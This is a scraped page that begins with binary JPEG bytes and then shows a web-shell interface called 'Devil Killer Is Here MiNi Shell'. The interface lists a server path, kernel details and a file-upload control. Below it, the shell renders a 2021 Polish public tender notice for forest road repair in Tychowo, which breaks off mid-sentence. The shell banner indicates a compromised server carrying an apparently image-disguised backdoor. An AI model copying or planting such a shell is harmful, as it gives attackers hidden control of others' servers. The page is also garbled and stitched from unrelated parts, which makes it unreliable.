JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210527/0006657101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00066571 z dnia 2021-05-27</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Naprawa i konserwacja gruntowych dróg leśnych na terenie Nadleśnictwa Tychowo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO TYCHOWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330044329</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bobolicka 86</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tychowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">94-31-15-201</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">tychowo@szczecinek.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://tychowo.szczecinek.lasy.gov.pl/nadlesnictwo</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> działalność z zakresu gospodarki leśnej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Naprawa i konserwacja gruntowych dróg leśnych na terenie Nadleśnictwa Tychowo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-86118e0d-bed9-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00066571</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://tychowo.szczecinek.lasy.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/nadlesnictwo-tychowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Sposób<br/>sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>poz. 2452).Za datę wpływu oświadczeń, ofert, wniosków, zaświadczeń oraz informacji przyjmuje się<br/>datę ich przekazania do Platformy. Aktualny data i godzina, zsynchronizowane z Głównym Urzędem<br/>Miar, wyświetlane są w prawym górnym rogu Platformy.W celu skorzystania z Platformy konieczna jest<br/>rejestracja Wykonawcy pod adresem: (https://portal.smartpzp.pl/nadlesnictwo-tychowo po kliknięciu na<br/>przycisk „Załóż konto”. Wykonawca rejestrując się akceptuje warunki korzystania z Platformy,<br/>określone w Regulaminie podczas rejestracji oraz uznaje go za wiążący. Korzystanie z Platformy jest<br/>bezpłatne. Podgląd i pobieranie dokumentacji postępowania nie wymaga logowania.Zamawiający,<br/>informuje, że Platforma jest kompatybilna ze wszystkimi podpisami elektronicznymi. Do przesłania<br/>dokumentów i złożenia oferty nie jest niezbędne posiadanie certyfikatu kwalifikowanego. Szczegółowe<br/>informacje o sposobie pozyskania usługi kwalifikowanego podpisu elektronicznego oraz warunkach jej<br/>użycia można znaleźć na stronach internetowych kwalifikowanych dostawców usług zaufania, których<br/>lista znajduje się pod adresem internetowym: http://www.nccert.pl/kontakt.htm.Minimalne wymagania<br/>techniczne dotyczące korzystania z Platformy:a) przesyłane dokumenty powinny być załączone w<br/>formie plików w formacie odpowiednio . png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt,<br/>.ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg,b) wymagania<br/>sprzętowe dla Wykonawcy:przeglądarka internetowa Mozzilla Firefox ver. 65 i późniejsze, Google<br/>Chrome ver. 66 i późniejsze lub Opera ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet<br/>Explorer 11;lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera.<br/>Zalecane jest używanie najnowszych wersji przeglądarek, system operacyjny Windows 7 i późniejsze,<br/>zainstalowane środowisko Java w wersji min. 1.8 (jre), w przypadku przeglądarek Opera, Chrome i<br/>Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web,oprogramowanie SzafirHost w<br/>systemie operacyjnym, stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>1 Mb/s, komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 -<br/>lub ich nowsze wersje, zainstalowany program Acrobat Reader lub inny umożliwiający obsługę<br/>formatów .pdf.Pozostałe wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Regulaminie korzystania z Platformy.Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz<br/>do komunikacji wynosi 100 MB. Za pośrednictwem Systemu można przesłać wiele pojedynczych<br/>plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików.Ofertę oraz<br/>oświadczenia, składane na podstawie art. 125 ust. 1 PZP (sporządzane wg wzorów stanowiących<br/>odpowiednio załącznik nr 6 i 7 do SWZ), sporządza się, pod rygorem nieważności w formie<br/>elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych jest Nadleśnictwo<br/>Tychowo ul.Bobolicka86,78-220 Tychowo.W sprawach dotyczących przetwarzania danych osobowych<br/>można skontaktować się za pośrednictwem poczty elektronicznej:iod@compnet.<br/>pl.Zamawiający:Przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.Udostępnia dane osobowe,o których mowa w art.10RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej do upływu terminu do ich wniesienia.Do przetwarzania<br/>danych osobowych,o których mowa w art.10RODO mogą być dopuszczone wyłącznie osoby<br/>posiadające upoważnienie i obowiązane do zachowania ich w poufności.Dane osobowe przetwarzane<br/>będą na podstawie art.6ust.1 lit.c RODO w celu związanym z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem,oraz w celu zawarcia umowy w<br/>sprawie zamówienia publicznego i jej realizacji,a także udokumentowania postępowania o udzielenie<br/>zamówienia i jego archiwizacji. Odbiorcami danych osobowych będą osoby lub podmioty,którym<br/>dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP.Dane osobowe<br/>pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia<br/>publicznego będą przechowywane przez okres 4lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia publicznego, lub okres przechowywania obejmuje cały czas trwania umowy w sprawie<br/>zamówienia publicznego.Niezależnie od postanowień powyżej,w przypadku zawarcia umowy w<br/>sprawie zamówienia publicznego,dane osobowe będą przetwarzane do upływu okresu przedawnienia<br/>roszczeń wynikających z umowy w sprawie zamówienia publicznego.Dane osobowe pozyskane w<br/>związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane<br/>podmiotom świadczącym usługi doradcze.Osoba,której dotyczą pozyskane w związku z prowadzeniem<br/>niniejszego postępowania dane osobowe, ma prawo:1)dostępu do swoich danych osobowych zgodnie<br/>z art.15RODO,przy czym w sytuacji,gdy wykonanie obowiązków,o których mowa w art.15ust.1-3RODO<br/>wymagałoby niewspółmiernie dużego wysiłku Zamawiający może żądać wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania,w szczególności podania nazwy lub daty<br/>bieżącego bądź zakończonego postępowania o udzielenie zamówienia publicznego 2)do<br/>sprostowana swoich danych osobowych zgodnie z art.16RODO,przy czym skorzystanie z uprawnienia<br/>do sprostowania lub uzupełnienia danych osobowych nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie<br/>niezgodnym z PZP oraz nie może naruszać integralności protokołu oraz jego załączników;3)do żądania<br/>od Zamawiającego jako administratora, ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków o których mowa w art.18 ust.2RODO, ale nie ma zastosowania w<br/>odniesieniu do przechowywania,w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej,lub z uwagi na ważne względy interesu publicznego UE lub państwa członkowskiego;prawo to nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego4)wniesienia skargi do<br/>Prezesa UODO w przypadku uznania,iż przetwarzanie jej danych osobowych narusza przepisy<br/>RODO.Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>PZP,związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;konsekwencje<br/>niepodania określonych danych określa PZP.Osobie, której dane osobowe zostały pozyskane przez<br/>Zamawiającego w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia<br/>publicznego nie przysługuje:1)prawo do usunięcia danych osobowych, o czym przesadza art.17ust.3<br/>lit.b,d lub e RODO,2)prawo do przenoszenia danych osobowych, o którym mowa w art.20RODO,<br/>określone w art.21RODO prawo sprzeciwu wobec przetwarzania danych osobowych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.4.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 500623,12 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest naprawa i konserwacja gruntowych dróg leśnych na terenie<br/>Nadleśnictwa Tychowo.<br/>Przedmiot zamówienia obejmuje swym zakresem naprawę gruntowych dróg leśnych na krótkich<br/>(nie mniej jak 10 m), nieprzejezdnych odcinkach, wskazanych przez Zamawiającego w<br/>zleceniach, które będą wystawiane według bieżących potrzeb.<br/>Zakres prac obejmuje następujące metody naprawy dróg w szczególności:<br/>-profilowanie drogi z zaniżeniem poboczy do 30 cm, uzupełnienie ubytków w drodze mieszanką<br/>kruszywa łamanego z gruzu betonowego o frakcji od 0 do 63 mm i gr. 15 cm po zagęszczeniu<br/>oraz wykonanie górnej warstwy z pospółki o grubości 3cm po zagęszczeniu.<br/>-miejscowe uzupełnienie gruntowej powierzchni drogi ( wypełnienie pojedynczych dołów)<br/>kruszywem łamanym z gruzu betonowego o frakcji od 0 do 63mm w ilości 800 ton.<br/>-dowiezienie i rozplantowanie kruszywa w miejscach wskazanych w zleceniu wraz z<br/>zagęszczeniem i wyprofilowaniem konserwowanego miejsca oraz wykonaniem górnej warstwy z<br/>pospółki grubości 3cm po zagęszczeniu,<br/>Szczegółowy Opis Przedmiotu Zamówienia tanowi załącznik nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do Zamówienia, Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres<br/>rzeczowy obejmujący czynności takie same (analogiczne), jak opisane w opisie przedmiotu zamówienia („Opcja”).Przedmiotem Opcji będą usługi opisane w SWZ w Rozdziale 3 załącznika<br/>nr 2 do SWZ i wycenionych przez Wykonawcę w kosztorysie, stanowiącym część oferty. Prace<br/>będące przedmiotem Opcji mogą zostać zlecone w ilości stanowiącej równowartość do 25 %<br/>wartości przedmiotu zamówienia określonej zgodnie z § 10 ust. 1 wzoru umowy stanowiącego<br/>załącznik nr 10 do SIWZ. Podstawą określenia wartości prac zleconych w ramach Opcji (w celu<br/>określenia jej zakresu) będą ceny jednostkowe poszczególnych prac zawarte w kosztorysie<br/>ofertowym stanowiącym część Oferty. W ramach Opcji, wedle wyboru Zamawiającego, mogą<br/>zostać zlecone wszystkie, niektóre lub jedna z usług wskazanych w SWZ i wycenionych przez<br/>Wykonawcę w kosztorysie, stanowiącym część oferty. Zamawiający nie jest zobowiązany do<br/>zlecenia usług objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie.<br/>Usługi będące przedmiotem Opcji mogą zostać zlecone w ilości stanowiącej równowartość do<br/>25% wartości przedmiotu zamówienia określonej we wzorze umowy, stanowiącym załącznik nr<br/>10 do SWZ. Podstawą określenia wartości usług zleconych w ramach Opcji (w celu określenia<br/>jej zakresu) będą ceny jednostkowe poszczególnych usług/prac zawarte w kosztorysie,<br/>stanowiącym część oferty. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującymi<br/>kryteriami oceny ofert:<br/>1) Cena – 100 %<br/>Sposób obliczania punktów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x100 pkt x 100 %<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu oferty<br/>(załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do<br/>powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i<br/>usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od<br/>towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>Za najkorzystniejszą ofertę uznana zostanie Oferta wykonawcy, która uzyska największą liczbę<br/>punktów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>-zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do występowania w<br/>obrocie gospodarczym.<br/>-uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowe:<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku<br/>posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>-sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w<br/>postępowaniu w odniesieniu do warunku dot. sytuacji ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej zostanie spełniony jeśli Wykonawca wykaże, że<br/>posiada środki finansowe lub zdolność kredytową o wartości nie mniejszej niż 100 tys. PLN<br/>(słownie: sto tysięcy złotych 00/100).<br/>-zdolności technicznej lub zawodowej:<br/>Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że w okresie ostatnich 3 lat liczonych wstecz od dnia w którym upływa termin składania<br/>ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) zrealizował lub jest w<br/>realizacji co najmniej dwóch usługi polegających na naprawie lub konserwacji dróg (przez jedną<br/>usługę - rozumie się wykonywanie usług na podstawie 1 umowy) o wartości co najmniej 300<br/>000,00 zł brutto łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o<br/>których mowa w pkt 7.1. Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274<br/>ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących<br/>podmiotowych środków dowodowych:<br/>a) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych w okresie ostatnich 3 lat*, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których<br/>usługi te zostały wykonane i są wykonywane należycie, 3-letni okres liczony jest wstecz od dnia, w<br/>którym upływa termin składania ofert - (wzór wykazu usług stanowi załącznik nr 11 do SWZ),<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonanych wspólnie z innymi<br/>wykonawcami wykaz dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>b) Dowodów określających, czy wskazane przez Wykonawcę usługi na potwierdzenie spełnienia<br/>warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia<br/>zostały wykonane należycie.<br/>Dowodami, czy usługi zostały wykonane lub są wykonywane należycie są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,<br/>c) informacja banku lub spółdzielczej kasy 